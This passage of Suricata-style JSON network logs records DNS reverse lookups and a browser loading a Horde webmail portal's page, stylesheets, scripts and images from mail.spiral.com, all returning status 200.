{"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:19:47.053741+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39714,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.198540+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":54089,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":39715,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":1}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:19:47.309545+0000","flow_id":302055086514181,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":54089,"proto":"UDP","dns":{"type":"answer","id":39715,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:19:47.847877+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310}} 
{"timestamp":"2020-02-29T00:19:47.864664+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/login.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8310},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":49065,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.868234+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196}} {"timestamp":"2020-02-29T00:19:47.870387+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140}} 
{"timestamp":"2020-02-29T00:19:47.871903+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":140},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":222,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.873169+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201}} {"timestamp":"2020-02-29T00:19:47.875349+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":196},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":315,"tx_id":0}} 
{"timestamp":"2020-02-29T00:19:47.875779+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/ingo\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":201},"app_proto":"http","fileinfo":{"filename":"\/ingo\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":488,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.901833+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119}} {"timestamp":"2020-02-29T00:19:47.901898+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131}} 
{"timestamp":"2020-02-29T00:19:47.903351+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":131},"app_proto":"http","fileinfo":{"filename":"\/turba\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":147,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.904158+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947}} {"timestamp":"2020-02-29T00:19:47.904960+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306}} 
{"timestamp":"2020-02-29T00:19:47.905891+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordeblocks.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":306},"app_proto":"http","fileinfo":{"filename":"\/js\/hordeblocks.js","state":"CLOSED","stored":false,"size":528,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.906159+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110}} {"timestamp":"2020-02-29T00:19:47.907508+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/popup.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1110},"app_proto":"http","fileinfo":{"filename":"\/js\/popup.js","state":"CLOSED","stored":false,"size":2903,"tx_id":3}} {"timestamp":"2020-02-29T00:19:47.907715+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297}} {"timestamp":"2020-02-29T00:19:47.907813+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180}} {"timestamp":"2020-02-29T00:19:47.910822+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538}} {"timestamp":"2020-02-29T00:19:47.911656+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/topbar.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1180},"app_proto":"http","fileinfo":{"filename":"\/js\/topbar.js","state":"CLOSED","stored":false,"size":4199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.914177+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/en-US.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2297},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/en-US.js","state":"CLOSED","stored":false,"size":6704,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.914713+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721}} {"timestamp":"2020-02-29T00:19:47.914589+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/tooltips.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":947},"app_proto":"http","fileinfo":{"filename":"\/js\/tooltips.js","state":"CLOSED","stored":false,"size":2555,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.921254+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641}} {"timestamp":"2020-02-29T00:19:47.923471+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/block\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":119},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/block\/screen.css","state":"CLOSED","stored":false,"size":199,"tx_id":4}} {"timestamp":"2020-02-29T00:19:47.935410+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52910,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6117}} {"timestamp":"2020-02-29T00:19:47.936027+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/effects.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8721},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/effects.js","state":"CLOSED","stored":false,"size":38450,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.936336+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52916,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337}} {"timestamp":"2020-02-29T00:19:47.936171+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/date\/date.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17641},"app_proto":"http","fileinfo":{"filename":"\/js\/date\/date.js","state":"CLOSED","stored":false,"size":85570,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.936959+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52918,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113}} {"timestamp":"2020-02-29T00:19:47.937801+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52912,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974}} {"timestamp":"2020-02-29T00:19:47.937896+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569}} {"timestamp":"2020-02-29T00:19:47.938574+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/turba\/js\/minisearch.js?v=bdffa700049748b9e0ede1748b17c142","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":569},"app_proto":"http","fileinfo":{"filename":"\/turba\/js\/minisearch.js","state":"CLOSED","stored":false,"size":1408,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.939491+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52914,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105}} {"timestamp":"2020-02-29T00:19:47.938699+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/growler.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2538},"app_proto":"http","fileinfo":{"filename":"\/js\/growler.js","state":"CLOSED","stored":false,"size":8911,"tx_id":0}} {"timestamp":"2020-02-29T00:19:47.939371+0000","flow_id":1813814855284147,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52912,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/scriptaculous\/sound.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":974},"app_proto":"http","fileinfo":{"filename":"\/js\/scriptaculous\/sound.js","state":"CLOSED","stored":false,"size":2456,"tx_id":5}} {"timestamp":"2020-02-29T00:19:47.940311+0000","flow_id":217650389304327,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52914,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/tabset.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) 
Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":105},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/tabset.png","state":"CLOSED","stored":false,"size":105,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.941636+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52920,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116}} {"timestamp":"2020-02-29T00:19:47.942466+0000","flow_id":1479997112177472,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52920,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/sidebar-new-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":116},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/sidebar-new-bg.png","state":"CLOSED","stored":false,"size":116,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.942679+0000","flow_id":1702579497324555,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52916,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/logo.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2337},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/logo.png","state":"CLOSED","stored":false,"size":2337,"tx_id":2}} {"timestamp":"2020-02-29T00:19:47.944777+0000","flow_id":1369582092931394,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52918,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/head-bg.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":113},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/head-bg.png","state":"CLOSED","stored":false,"size":113,"tx_id":1}} {"timestamp":"2020-02-29T00:19:47.944907+0000","flow_id":737255532685455,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52910,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/hordecore.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; 